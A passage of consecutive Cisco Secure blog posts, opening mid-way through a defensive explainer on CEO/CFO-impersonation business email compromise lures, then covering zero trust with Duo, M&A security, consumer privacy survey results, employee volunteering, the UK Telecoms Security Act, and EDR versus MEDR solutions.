Below, we’ve placed an example of a lure, which will test the victim to see if there is a means to quickly establish trust. Here, the threat actor is pretending to be the Chief Financial Officer (CFO) of the victim’s organization. If the lure is successful, then the threat actor will progress the attack, and often request sensitive records or wire transfers. Notice that in the email headers, the person pretending to be the CFO is using a Gmail account, one that was likely created just for this attack. The message is brief, stresses importance and urgency, and requests assistance, playing on the victim’s workflow and desire to help an executive or someone with authority.

The example below is a simplified one, to be sure, but the elements are legitimate. Daily, emails like this hit the inboxes of organizations globally, and the attackers only need to locate a single victim to make their efforts payout.

Figure 1: An example of an Initial lure to establish trust

In the FBI / IC3 2021 Internet Crime Report, there were nearly 20,000 Business Email Compromise complaints filed, with an adjusted loss of nearly 2.4 billion dollars.  While spoofing the identity of an executive is certainly one way to conduct a BEC attack, the FBI says that threat actors have started leveraging the normality of hybrid-work to target meeting platforms to establish trust and conduct their crimes. When successful, the funds from the fraudulent wire transfers are moved to crypto wallets and the funds dispersed, making recovery harder.

So as an end user what can you do to protect your organization? Be mindful anytime you receive an urgent call to action, especially when the subject involves money. If your workflow means that you regularly receive these types of requests from the specific individual, verify their identity and the validity of the request using another channel of communication, such as in person or via phone. If you do validate their identity via the phone, take care to avoid calling any numbers listed in the email.

Cisco Secure Email helps stop these types of attacks by tracking user relationships and threat techniques. These techniques often include account takeover, spoofing and many more. Using an intent-based approach allows Secure Email to detect and classify business email compromises and other attacks, so administrators are empowered to take a risk-based approach to stopping these threats.

Find out more about how Cisco Secure Email can help keep your organization safe from phishing.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

There’s no better time for zero trust

By Neville Letzerich

Security resilience requires strong, user-friendly defenses

The concept of zero trust is not a new one, and some may even argue that the term is overused. In reality, however, its criticality is growing with each passing day. Why? Because many of today’s attacks begin with the user. According to Verizon’s Data Breach Investigations Report, 82% of breaches involve the human element — whether it’s stolen credentials, phishing, misuse or error.

Additionally, today’s businesses are hyper-connected, meaning that — in addition to your employees — customers, partners and suppliers are all part of your ecosystem. Couple that with hybrid work, IoT, the move to the cloud, and more emboldened attackers, and organizational risk increases exponentially.

Adopting a zero trust model can dramatically reduce this risk by eliminating implicit trust. It has become so crucial, in fact, that several governments including the U.S., UK and Australia have released mandates and guidance for how organizations should deploy zero trust to improve national security.

However, because zero trust is more of a concept than a technology, and so many vendors use the term, organizations struggle with the best way to implement it. At Cisco, we believe you should take a holistic approach to zero trust, starting with what you have and adding on as you identify gaps in your defenses. And while layers of protection are necessary for powerful security, so is ease of use.

Strengthen security resilience with zero trust

Zero trust plays a major role in building security resilience, or the ability to withstand unpredictable threats or changes and emerge stronger. Through zero trust, the identity and security posture of users, devices and applications are continuously checked and verified to prevent network intrusions — and to also limit impact if an unauthorized entity does gain access.

Organizations with high zero trust maturity are twice as likely to achieve business resilience.
– Cisco’s Guide to Zero Trust Maturity

Eliminating trust, however, doesn’t really conjure up images of user-friendly technology. No matter how necessary they are for the business, employees are unlikely to embrace security measures that make their jobs more cumbersome and time-consuming. Instead, they want fast, consistent access to any application no matter where they are or which device they are using.

That’s why Cisco is taking a different approach to zero trust — one that removes friction for the user. For example, with Cisco Secure Access by Duo, organizations can provide those connecting to their network with several quick, easy authentication options. This way, they can put in place multi-factor authentication (MFA) that frustrates attackers, not users.

Enable seamless, secure access

Cisco Secure Access by Duo is a key pillar of zero trust security, providing industry-leading features for secure access, authentication and device monitoring. Duo is customizable, straightforward to use, and simple to set up. It enables the use of modern authentication methods including biometrics, passwordless and single sign-on (SSO) to help organizations advance zero trust without sacrificing user experience. Duo also provides the flexibility organizations need to enable secure remote access with or without a VPN connection.

During Cisco’s own roll-out of Duo to over 100,000 people, less than 1% of users contacted the help desk for assistance. On an annual basis, Duo is saving Cisco $3.4 million in employee productivity and $500,000 in IT help desk support costs. Furthermore, 86,000 potential compromises are averted by Duo each month.

Protect your hybrid work environment

La-Z-Boy, one of the world’s leading residential furniture producers, also wanted to defend its employees against cybersecurity breaches through MFA and zero trust. It needed a data security solution that worked agnostically, could grow with the company, and that was easy to roll out and implement.

“When COVID first hit and people were sent home to work remotely, we started seeing more hacking activity…” said Craig Vincent, director of IT infrastructure and operations at La-Z-Boy. “We were looking for opportunities to secure our environment with a second factor…. We knew that even post-pandemic we would need a hybrid solution.”

“It was very quick and easy to see where Duo fit into our environment quite well, and worked with any application or legacy app, while deploying quickly.” – Craig Vincent, Director of IT Infrastructure and Operations, La-Z-Boy

Today, Duo helps La-Z-Boy maintain a zero trust framework, stay compliant, and get clear visibility into what is connecting to its network and VPN. Zero trust helps La-Z-Boy secure its organization against threats such as phishing, stolen credentials and out-of-date devices that may be vulnerable to known exploits and malware.

Build a comprehensive zero trust framework

As mentioned, zero trust is a framework, not a single product or technology. For zero trust to be truly effective, it must do four things:

  1. Establish trust for users, devices and applications trying to access an environment
  2. Enforce trust-based access based on the principle of least privilege, only granting access to applications and data that users/devices explicitly need
  3. Continuously verify trust to detect any change in risk even after initial access is granted
  4. Respond to changes in trust by investigating and orchestrating response to potential incidents

Many technology companies may offer a single component of zero trust, or one aspect of protection, but Cisco’s robust networking and security expertise enables us to provide a holistic zero trust solution. Not only can we support all the steps above, but we can do so across your whole IT ecosystem.

Modern organizations are operating multi-environment ecosystems that include a mix of on-premises and cloud technologies from various vendors. Zero trust solutions should be able to protect across all this infrastructure, no matter which providers are in use. Protections should also extend from the network and cloud to users, devices, applications and data. With Cisco’s extensive security portfolio, operating on multiple clouds and platforms, zero trust controls can be embedded at every layer.

Map your path to zero trust

Depending on where you are in your security journey, embedding zero trust at every layer of your infrastructure may sound like a lofty endeavor. That’s why we meet customers where they are on their path to zero trust. Whether your first priority is to meet regulatory requirements, secure hybrid work, protect the cloud, or something else, we have the expertise to help you get started. We provide clear guidance and technologies for zero trust security mapped to established frameworks from organizations like CISA and NIST.

Much of our Cisco Secure portfolio can be used to build a successful zero trust framework, but some examples of what we offer include:

  • Frictionless, secure access for users, devices and applications through Cisco Duo
  • Flexible cloud security through Cisco Umbrella
  • Protected network connections and segmentation with the Cisco Identity Services Engine (ISE)
  • Application visibility and micro-segmentation via Cisco Secure Workload
  • Expert guidance from the Cisco Zero Trust Strategy Service

All of our technologies and services are backed by the unparalleled intelligence of Cisco Talos — so you always have up-to-date protection as you build your zero trust architecture. Additionally, our open, integrated security platform — Cisco SecureX — makes it simple to expand and scale your security controls, knowing they will work with your other technologies for more unified defenses.

Enhance security with an integrated platform

As Italy’s leading insurance company, Sara Assicurazioni requires complete visibility into its extended network, including a multi-cloud architecture and hybrid workforce. The company has adopted a comprehensive zero trust strategy through Cisco Secure.

“Our decentralized users, endpoints, and cloud-based servers and workloads contribute to a large attack surface,” says Paolo Perrucci, director of information and communications technology architectures and operations at Sara Assicurazioni. “With Cisco, we have the right level of visibility on this surface.”

“The main reason we chose Cisco is that only Cisco can offer a global security solution rather than covering one specific point…. Thanks to Cisco Secure, I’m quite confident that our security posture is now many times better because we are leveraging more scalable, state-of-the-art security solutions.” – Luigi Vassallo, COO & CTO, Sara Assicurazioni

Expand your zero trust strategy

To learn more, explore our zero trust page and sign up for one of our free zero trust workshops.

Watch video: How Cisco implemented zero trust in just five months 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Making Merger and Acquisition Cybersecurity More Manageable

By Dan Burke

Dan Burke is the director of strategy, risk, and compliance for AppDynamics, a company acquired by Cisco in 2017. Burke and his team are a vital part of the Cisco acquisition process in helping acquired companies adhere to a higher level of cybersecurity. This blog is the fourth in a series focused on M&A cybersecurity, following Shiva Persaud’s post on When It Comes to M&A, Security Is a Journey.

Engaging Earlier to Identify and Manage Risk

Part of the secret to Cisco’s success is its ability to acquire companies that strengthen its technology portfolio and securely integrate them into the larger organization. From the outside, that process might appear seamless—consider Webex or Duo Security, for instance—but a fruitful acquisition takes tremendous work by multiple cross-functional teams, mainly to ensure the acquired company’s solutions and products meet Cisco’s rigorous security requirements.

“My team is responsible for aligning new acquisitions to Cisco controls to maintain our compliance with SOC2 and FedRAMP, as well as other required certifications,” says Burke.

When Cisco acquires a new company, it conducts an assessment and produces a security readiness plan (SRP) document. The SRP details the identified weaknesses and risks within that company and what they need to fix to meet Cisco standards.

“In the past, my team wouldn’t find out about an acquisition until they received a completed SRP.  The downside of this approach was that the assessments and negotiations had been done without input from our group of experts, and target dates for resolution had already been decided on,” shares Burke.

“We needed to be involved in the process before the SRP was created to understand all risks and compliance issues in advance. Now we have a partnership with the Cisco Security and Trust M&A team and know about an acquisition months before we can start working to address risks and other issues—before the SRP is completed and the due dates have been assigned,” Burke adds.

“Another issue resolved in this process change is that Cisco can gain earlier access to the people in the acquired company who know the security risks of their solutions. During acquisitions, people will often leave the company, taking with them their institutional knowledge, resulting in Cisco having to start from scratch to identify and assess the risks and determine how best to resolve them as quickly as possible,” says Burke. “It could be vulnerabilities in physical infrastructure or software code or both. It could be that the company isn’t scanning often enough, or they don’t have SOC 2 or FedRAMP certification yet—or they’re not using Cisco’s tools.”

“Third-party vendors and suppliers can also present an issue,” he adds. “One of the biggest risk areas of any company is outside vendors who have access to a company’s data. It’s vital to identify who these vendors are and understand the level of access they have to data and applications. The earlier we know all these things, the more time we must devise solutions to solve them.”

“Now that I’m in the process earlier, I can build a relationship with the people who have the security knowledge—before they leave. If I can understand their mindset and how all these issues came about, I can help them assimilate more easily into the bigger Cisco family,” says Burke.

Managing Risk During the M&A Process

The additional benefits of bringing teams in earlier are reduced risk and compliance requirements can be met earlier. It also provides a smoother transition for the company being acquired and ensures they meet the security requirements that customers expect when using their technology solutions.

“Without that early involvement, we might treat a low-risk issue as high risk, or vice versa. The misclassification of risk is extremely dangerous. If you’re treating something as high risk, that’s low risk, and you’re wasting people’s time and money. But if something’s high risk and you’re treating it as low risk, then you’re in danger of harming your company,” Burke shares.

“The key is to involve their risk, compliance, and security professionals from the beginning. I think other companies keep the M&A process so closely guarded, to their detriment. I understand the need for privacy and to make sure deals are confidential but bringing us in earlier was an advantage for the M&A team and us,” Burke adds.

Ensuring a Successful M&A Transition

When asked what he thinks makes Cisco successful in M&A, Burke says, “Cisco does an excellent job of assimilating everyone into the larger organization. I have worked at other companies where they kept their acquisitions separate, which means you have people operating separately with different controls for different companies. That’s not only a financial burden but also a compliance headache.”

“That’s why Cisco tries to drive all its acquisitions through our main programs and controls. It makes life easier for everyone in terms of compliance. With Cisco, you have that security confidence knowing that all these companies are brought up to their already very high standards, and you can rely on the fact that they don’t treat them separately. And when an acquisition has vulnerabilities, we identify them, set out a remediation path, and manage the process until those risks are resolved,” Burke concludes.

Related Blogs

Managing Cybersecurity Risk in M&A

Demonstrating Trust and Transparency in Mergers and Acquisitions

When It Comes to M&A, Security Is a Journey

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Introducing “NEXT” by Cisco Secure

By Tazin Khan

Inspiring discussions around innovative tech  

Technology has typically had a reputation for being exciting and inventive. Unfortunately, this hasn’t always been the case for security. But times have changed. We are now recognizing the crucial role security plays in any groundbreaking technology. Without strong defenses, even the most visionary app is likely to crash and burn. So it’s imperative that big security players like Cisco stay on top of what’s next.

I am thrilled to announce that in November, we will be launching our new video series, “NEXT” by Cisco Secure. In the series, my esteemed co-host TK Keanini and I will interview some of the brightest new minds in tech to find out more about the future of the industry and how we can best secure it. Watch the series preview below!

“NEXT” by Cisco Secure

Bringing cyber pioneers to the forefront  

As the CTO of Cisco Secure, TK has over 25 years of networking and security expertise, as well as a penchant for driving technical innovation. As for me, I’m a cybersecurity specialist of 10 years with an obsession for communication and empathy. Together, TK and I will bring new cyber pioneers to the forefront and highlight the criticality of digital protection and privacy for everyone.

Whether we’re discussing Web3, the metaverse, or next-generation healthcare, we’ll learn and laugh a lot. Through simple conversations about complex topics, we’re building a bridge between leading-edge tech and how Cisco is helping to safeguard what’s on the horizon.

Expanding security awareness 

And what better time to preview this series than during Cybersecurity Awareness Month? A time when we focus on the reality that security belongs to everyone — not just the threat hunter, or the product engineer, or the incident responder — but everyone.

We all have a responsibility to protect the world’s data and infrastructure, and should all have a seat at the table for important security conversations. We hope you’ll join us as we dive into what’s making waves out there, and how we can keep it safe.

Be a part of what’s next  

Follow our Cisco Secure social channels to catch our first episode in November, when we will speak with Michael Ebel, CEO of Atmosfy. Atmosfy is revolutionizing restaurant reviews by incorporating engaging live video that inspires others and supports local businesses. TK and I will chat with Michael about the origin of Atmosfy, and how the company keeps its content authentic and organization resilient.

In the meantime, explore our other Cybersecurity Awareness Month resources.

Who do you want to hear from next? Tell us your ideas for future guests in the comments.  

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Data Transparency and its Impact on Customer Trust

By Robert Waitman

How do organizations earn and build trust when it comes to the personal data that customers share with them? Customers certainly expect these organizations to comply with all privacy laws that are now in place in more than 130 countries. Customers also expect them not to sell personal data without consent and to try to avoid data breaches that could expose personal data. While these actions are necessary, organizations still need to do more when it comes to customer trust. According to our latest research, consumers’ top priority is, in fact, for organizations to be more transparent about how they use personal data.

The Cisco 2022 Consumer Privacy Survey, released today, explores what organizations can do to earn and build trust with customers, the actions individuals are taking to protect their data, the impact of privacy laws around the world, and some of the benefits and costs of Artificial Intelligence (AI) and data localization requirements. The report, our fourth annual look at consumer privacy issues, draws on anonymous responses from 2600 adults in 12 countries.

Here are some highlights from the survey:

  1. Consumers chose ‘data transparency’ as the top thing organizations can do to build trust regarding how personal data is used and protected. At 39%, data transparency was selected almost twice as much as ‘refraining from selling personal information’ (21%) or ‘complying with all privacy laws’ (20%).
  2. More consumers are taking action to protect their personal data. Results showed that 37% have stopped using a company or provider over their data practices, with 24% having exercised their Data Subject Access Rights to inquire about the data companies have about them, and 14% having requested changes or deletions to that data.
  3. When it comes to applying and using AI, consumers are supportive, but very concerned with today’s practices. While 43% say AI can be useful in improving our lives and 54% are even willing to share their anonymized personal data to improve AI products, 60% are concerned about how businesses are using AI today. In fact, 65% say they have already lost trust in organizations due to their AI practices.
  4. Consumers continue to strongly support their nation’s privacy laws, as they want their government to take a leading role in protecting personal privacy. On average, 61% felt these laws are having a positive impact, whereas only 3% believe they are having a negative impact. Awareness of these laws continues to be a challenge as only 43% say they are aware of their country’s privacy laws.
  5. Consumers are evenly split on the value of data localization requirements that add cost to the products and services they buy, with 41% in favor and 41% against. Interestingly, in 9 of the 12 countries surveyed, more respondents were against data localization than in favor.

Check out the associated infographic that provides visual and easily consumable descriptions of the key data.

At Cisco, we believe that privacy is a fundamental human right. Privacy continues to be a high priority for consumers, and organizations need to do their part to protect personal data and build consumer confidence in how this data is being used. Some recommendations for organizations include:

  • Investing in transparency. Show your customers where they can find your company’s privacy policies and tell them in easy-to-understand ways exactly how you use their data (see, for example, Cisco’s in Privacy Data Sheets and Data Maps) as this is critical for earning and building their trust.
  • Helping to ensure your customers are aware of relevant privacy laws and their rights. Individuals who know about these protections are more likely to trust organizations with their personal data and have confidence that their data is protected.
  • Adopting measures to ensure responsible use of data. While misuse of personal data in AI can erode consumer trust, some positive steps to apply and use it responsibly include implementing an AI governance framework, providing transparency on how personal data is used in any AI application, and enabling customers to opt out of the specific application.
  • Evaluating the costs and legal alternatives, if any, to data localization requirements. These requirements may not be worth their cost to many consumers, and it is still unclear if they contribute to greater safety and privacy.

Privacy remains a critical element of trust. Consumers want more transparency and control of their personal data, especially as we continue to see innovations in technology. As we are now in the midst of Cybersecurity Awareness Month in the US and other countries around the world, it’s a great time to learn more and join in activities and discussions that advance cybersecurity.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Employee Volunteer Program Supports Youth Globally

By Mary Kate Schmermund

Giving back is part of the ethos at Cisco. Part of how that happens is through employees volunteering as part of Cisco’s Time2Give benefit in which employees can use paid time to contribute to their communities and support the causes they’re passionate about. During the pandemic, Cisco increased this benefit from five paid volunteering days to 10 and encourages virtual volunteering, too.

Elizabeth Chang, a software engineer on the Duo Security platform services team, considers Time2Give a great opportunity to “invest in people around you. It is amazing that Cisco supports what we are passionate about and that we can use this time to grow ourselves in other areas of life,” she said.

Cisconians care deeply about many causes, and this post celebrates how teammates spend their time supporting children, youth and teens in and out of school and those preparing for college. Stay tuned for future posts highlighting how other employees give their time. You may even be inspired to find out how you can develop your skills while contributing to organizations that matter to you!

Summer + After School Engagement

Pierpaolo Panarotto, an account executive on Duo’s EMEAR continental team, volunteers at Sport senza frontiere onlus, a summer sports camp in Italy for refugee children. This summer Panarotto tutored and taught badminton. The program also welcomed children from Ukraine this year.

For Panarotto, the best part, hands down, was seeing the children’s smiles. He advised, “Give back to your community. Sometimes we forget how lucky we are.”

Chang also volunteered at a summer camp, supporting middle and high school students in Boston. The program she supported, Area Youth Ministry Leadership Camp and Summer Boost, fosters leadership skills and college readiness while promoting mentorship.

By helping lead a coding workshop, Chang was able to share what she does professionally. “I was glad that I got to help inspire youth to pursue computer science,” she said. The camp was such a hit that many participants “didn’t want to go home because they had such a fun time,” Chang shared.

“Take the time! You’ll never get the opportunity to go back and take it later. Your community and your heart will thank you!” – Sarah Moon-Musser

Now that school has started, Engineering Program Manager in Platform Engineering Sarah Moon-Musser helps teach the Belleville High School Marching Band’s color guard choreography for their halftime show. She loves spending time with the students. To those considering utilizing Time2Give Moon-Musser says, “Take the time! You’ll never get the opportunity to go back and take it later. Your community and your heart will thank you!”

Employees Volunteer to Support College Readiness Virtually

College readiness is also a passion for Justin Fan and Seema Kathuria who both volunteer with Code2College. They’re able to volunteer virtually by reviewing resumes and college entrance essays and providing constructive feedback through shared documents.

Senior Product Marketing Manager, Kathuria appreciates “learning about the experiences of high school students and how they approach writing about their accomplishments,” she said.

For Fan, a senior customer success manager in security customer success, “the best part is supporting younger generations as they move into college and career. They’re so much more focused and mature than I was at their age,” he said. Fan also participates in virtual career workshops with high school and college students with Students Rising Above.

Time2Give?

For others wanting to use Time2Give, Fan suggests finding opportunities you’re passionate about and utilizing light meeting days to volunteer. Kathuria says, “Take advantage of the 10 Time2Give days per year that Cisco gives us. It is very generous, and it feels so good to give back to the community in whatever way makes you happy and fulfilled.”

Employee Volunteer Program High on Your List?

If you’re looking to feel fulfilled by your work and the impact you can make, please check out our open roles.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

The Upcoming UK Telecoms (Security) Act Part One: What, Why, Who, When and How

By Richard Archdeacon

In November 2020, the Telecommunications (Security) Bill was formally introduced to the UK’s House of Commons by the department for Digital, Culture, Media & Sport. Now, after several readings, debates, committee hearings, and periods of consultation, the Telecommunications (Security) Act is quickly becoming reality for providers of public telecoms networks and services in the UK, going live on 1 October 2022. Here, we outline what exactly the requirements mean for these firms, and what they can do to prepare.

What is the Telecommunications (Security) Act?

The Act outlines new legal duties on telecoms firms to increase the security of the entire UK network and introduces new regulatory powers to the UK Telecoms regulator OFCOM to regulate Public Telecommunications Providers in the area of cyber security. It place obligations on operators to put in place more measures around the security of their supply chains, which includes the security of the products they procure. The Act grants powers to the Secretary of State to introduce a so-called Code of Practice. It is this Code of Practice which contains the bulk of the technical requirements that operators must comply with. Those not in compliance face large fines (up to 10% of company turnover for one year).

Why has the Telecommunications (Security) Act been introduced?

Following the UK Telecoms Supply Chain review in 2018, the government identified three areas of concern that needed addressing:

  1. Existing industry practices may have achieved good commercial outcomes but did not incentivise effective cyber security risk management.
  2. Policy and regulation in enforcing telecoms cyber security needed to be significantly strengthened to address these concerns.
  3. The lack of diversity across the telecoms supply chain creates the possibility of national dependence on single suppliers, which poses a range of risks to the security and resilience of UK telecoms networks.

Following the review, little did we know a major resilience test for the telecoms industry was about to face significant challenges brought on by the Covid-19 pandemic. Data released by Openreach – the UK’s largest broadband network, used by customers of BT, Plusnet, Sky, TalkTalk, Vodafone and Zen – showed that broadband usage more than doubled in 2020 with 50,000 Petabytes (PB) of data being consumed across the country, compared to around 22,000 in 2019.

There is no question the security resilience of the UK telecoms sector is becoming ever more crucial — especially as the government intends to bring gigabit capable broadband to every home and business across the UK by 2025. As outlined in the National Cyber Security Centre’s Security analysis for the UK telecoms sector, ‘As technologies grow and evolve, we must have a security framework that is fit for purpose and ensures the UK’s Critical National Telecoms Infrastructure remains online and secure both now and in the future’.

Who does the Telecommunications (Security) Act affect?

The legislation will apply to public telecoms providers (including large companies such as BT and Vodafone and smaller companies that offer telecoms networks or services to the public). More specifically to quote the Act itself:

  • Tier 1: This applies to the largest organisations with an annual turnover of over £1bn providing public networks and services for which a security compromise would have the most widespread impact on network and service availability, and the most damaging economic or social effects.
  • Tier 2 providers would be those medium-sized companies with an annual turnover of more than £50m, providing networks and services for which security compromises would have an impact on critical national infrastructure (CNI) or regional availability with potentially significant security, economic or social effects.
  • Tier 3 providers would be the smallest companies with an annual turnover of less than £50m in the market that are not micro-entities. While security compromises to their networks or services could affect their customers, if those networks and services do not support CNI such compromises would not significantly affect national or regional availability.

When do companies need to start adhering to the Telecommunications (Security) Act?

As the requirements are long and varied and so the timelines to comply have been broken down to help organisations comply. The current Code of Practice expects Tier 1 providers to implement ‘the most straightforward and least resource intensive measures’ by 31 March 2024, and the more complex and resource intensive measures by 31 March 2025.

Tier 2 firms have been given an extra two years on top of the dates outlined above to reflect the relative sizes of providers. Tier 3 providers aren’t in scope of the regulatory changes currently but are strongly encouraged to use the Code of Practice as best practice. The Code of Practice also expects that these firms ‘must continue to take appropriate and proportionate measures to comply with their new duties under the Act and the regulations’.

How can firms prepare for the Telecommunications (Security) Act?

The TSA introduces a range of new requirements for those in the telecoms industry to understand and follow. These will require a multi-year programme for affected organisations.  An area of high focus for example will be on Third Party controls and managing the relationship with them.

However there are more common security requirements as well.  From our work with many companies across many different industries, we know that establishing that users accessing corporate systems, data and applications are who they say they are is  a key aspect of reducing risk by limiting the possibility of attacks coming in through the front door. This is a very real risk highlighted in Verizon’s 2022 Data Breaches Investigations Report, which states that around 82% of data breaches involved a human element, including incidents in which employees expose information directly or making a mistake that enables cyber criminals to access the organisation’s systems.

Therefore, one area to start to try and protect the organisation and take a step on the way to compliance is to build up authentication and secure access to systems, data and applications. However even this can take time to implement over large complex environments. It means gaining an understanding of all devices and ensuring there is a solid profile around them, so they can be reported on, attacks can be blocked and prevented, and access to applications can be controlled as needed.

Where can you find more insight on Telecommunications (Security) Act?

We will be creating more information around the Act as we move closer to the deadlines, including part two of this blog where we will take a deeper dive into themes introduced by the bill, how it compare with other industries’ and jurisdictions’ cyber security initiatives, and explore what else the telecoms industry can do to improve its security posture.

We are also running an event in London on 13 October: ‘Are you ready for TSA?’ which will include peer discussions where participation is welcome on the TSA. If you are interested in attending, please register here.

Register to attend the discussion on the new Telecom Security Act:

Are you ready for TSA?

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Unscrambling Cybersecurity Acronyms: The ABCs of EDR and MEDR Security

By Nirav Shah

In the first part of this blog series on Unscrambling Cybersecurity Acronyms, we provided a high-level overview of the different threat detection and response solutions and went over how to find the right solution for your organization. In this blog, we’ll do a deeper dive on two of these solutions – Endpoint Detection and Response (EDR) and Managed Endpoint Detection and Response (MEDR). However, first let’s take a look back at the history of endpoint security solutions and understand how we got EDR and MEDR security solutions.

Evolution of endpoint security solutions

The very first endpoint security solutions started out as anti-virus solutions (AV) with basic security functionality that relied heavily on signature-based detection. These solutions were effective against known threats where a signature was created, but ineffective against unknown threats such as new and emerging attacks. That meant that organizations struggled to stay ahead of attackers, who were continuously evolving their techniques to evade detection with new types of malware.

To address this problem, AV vendors added detection technologies such as heuristics, reputational analysis, behavioral protection, and even machine learning to their solutions, which became known as Endpoint Protection Platforms (EPP). These unified solutions were effective against both known and unknown threats and frequently used multiple approaches to prevent malware and other attacks from infecting endpoints.

As cyberattacks grew increasingly sophisticated though, many in the cybersecurity industry recognized that protection against threats wasn’t enough. Effective endpoint security had to include detection and response capabilities to quickly investigate and remediate the inevitable security breach. This led to the creation of EDR security solutions, which focused on post-breach efforts to contain and clean up attacks on compromised endpoints.

Today, most endpoint security vendors combine EPP and EDR solutions into a single, converged solution that provides holistic defense to customers with protection, detection, and response capabilities. Many vendors are also offering EDR as a managed service (also known as MEDR) to customers who need help in securing their endpoints or who don’t have the resources to configure and manage their own EDR solution. Now that we’ve gone over how endpoint security evolved into EDR and MEDR security solutions, let’s cover EDR and MEDR in more depth.

Figure 1: History of Endpoint Security Solutions

What are Endpoint Detection and Response (EDR) solutions?

EDR solutions continuously monitor your endpoints for threats, alert you in case suspicious activity is detected, and allow you to investigate, respond to and contain potential attacks. Moreover, many EDR security solutions provide threat hunting functionality to help you proactively spot threats in your environment. They’re often coupled with or part of a broader endpoint security solution that also includes prevention capabilities via an EPP solution to protect against the initial incursion.

As a result, EDR security solutions enable you to protect your organization from sophisticated attacks by rapidly detecting, containing, and remediating threats on your endpoints before they gain a foothold in your environment. They give you deep visibility into your endpoints while effectively identifying both known and unknown threats. Furthermore, you can quickly contain attacks that get through your defenses with automated response capabilities and hunt for hidden threats that are difficult to detect.

While EDR provides several benefits to customers, it has some drawbacks. Chief among them is that EDR security solutions are focused on monitoring endpoints only versus monitoring a broader environment. This means that EDR solutions don’t detect threats targeting other parts of your environment such as your network, email, or cloud infrastructure. In addition, not every organization has the security staff, budget, and/or skills to deploy and run an EDR solution. This is where MEDR solutions come into play.

What are Managed Endpoint Detection and Response (MEDR) solutions?

Managed EDR or MEDR solutions are EDR capabilities delivered as a managed service to customers by third-parties such as cybersecurity vendors or Managed Service Providers (MSPs). This includes key EDR functionality such as monitoring endpoints, detecting advanced threats, rapidly containing threats, and responding to attacks. These third-parties usually have a team of Security Operations Center (SOC) specialists who monitor, detect, and respond to threats across your endpoints around the clock via a ‘follow the sun’ approach to monitoring.

MEDR security solutions allow you to offload the work of securing your endpoints to a team of security professionals. Many organizations need to defend their endpoints from advanced threats but don’t necessarily have the desire, resources, or expertise to manage an EDR solution. In addition, a team of dedicated SOC experts with advanced security tools can typically detect and respond to threats faster than in-house security teams, all while investigating every incident and prioritizing the most critical threats. This enables you to focus on your core business while getting always-on security operations.

Similar to EDR though, one downside to MEDR security solutions is that they defend only your endpoints from advanced threats and don’t monitor other parts of your infrastructure. Moreover, while many organizations want to deploy EDR as a managed service, not everyone desires this. For example, larger and/or more risk-averse organizations who are looking to invest heavily in cybersecurity are typically satisfied with running their own EDR solution. Now, let’s discuss how to choose the right endpoint security solution when trying to defend your endpoints from threats.

Choosing the Right Endpoint Security Solution

As I mentioned in my previous blog, there isn’t a single correct solution for every organization. This logic applies to EDR and MEDR security solutions as well since each solution works well for different types of organizations, depending on their needs, resources, motivations, and more. Nevertheless, one major factor to consider is if you have or are willing to build out a SOC for your organization. This is important because organizations that don’t have or aren’t willing to develop a SOC usually gravitate towards MEDR solutions, which don’t require significant investments in cybersecurity.

Another factor to keep in mind is your security expertise. Even if you’re have or are willing to build a SOC, you may not have the right cybersecurity talent and skills within your organization. While you can always build out your security team, you may want to evaluate an MEDR solution because a lack of expertise makes it difficult to effectively manage an EDR solution. Finally, a common misconception is that you must choose between an EDR and a MEDR solution and that you cannot run both solutions. In reality, many organizations end up using both EDR and MEDR since MEDR solutions often complement EDR deployments.

I hope this information and key factors help you better understand EDR and MEDR solutions while acting as a guide to selecting the best endpoint security solution for your organization. For more details on the different cybersecurity acronyms and how to identify the right solution for your needs, stay tuned for the next blog in this series – Unscrambling Cybersecurity Acronyms: The ABCs of MDR and XDR Security. In the meantime, learn how Cisco Secure Endpoint stops threats with a comprehensive endpoint security solution that includes both advanced EDR and MEDR capabilities powered by an integrated security platform!


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Secure 5 Best Practices Security Analysts Can Use to Secure Their Hybrid Workforce.

By Truman Coburn

The hybrid work environment has been around for years, albeit not common but it existed. I can recall my first job where I was able to split my time working in an office and working from my makeshift home office. This was many moons ago as I will call it… pre-COVID-19. 

Job seekers are certainly looking to have the flexibility of working from anywhere at any time – preferably in an environment of their choosing. Even though a hybrid workforce will provide people with the option to work from anywhere, those remote locations are sometimes in unsecured locations. Organizations must now reimagine a workforce that will need access to your internal collaboration tools along with access to your network from both on- and off-premises. 

Leading the way in a hybrid environment 

Cisco, a leader in equipping organizations with the right products for a hybrid workforce, provides the tools & services to protect your organization from bad threat actors. 

With pervasive ransomware attacks, malware attacks, and email attacks, you must be ready and have not only a security solution but also a security analyst team ready to respond when an attack happens. 

Securing access to your endpoint must be a top priority and your security analysts must be agile and have the right telemetry to provide around-the-clock monitoring and the ability to quickly respond to threats. 

Security Analyst don’t just monitor they respond to threats  

Cisco Secure Endpoint provides you with the visibility and ability to respond to threats by blocking them before they compromise your network. Combined with global, proactive threat hunting, leading-edge forensic/analytic capabilities, and reduced leading Mean Time To Detection (MTTD)/Mean Time To Resolution (MTTR) across the supply chain that no other vendor can parallel; why would you partner with any other company to secure and scale your unique hybrid workforce or workplace clients? 

Click here to listen to my fireside chat on how we at Cisco would define 5 Best Practices Security Analysts Can Use to Secure Their Hybrid Workforce:

I am joined by Cisco Talos global Senior Threat Defense and Response Analyst, William (Bill) Largent who has over 20 plus years of infosec experience, specifically in network intrusion detection, traffic analysis, and signature/rule writing. 

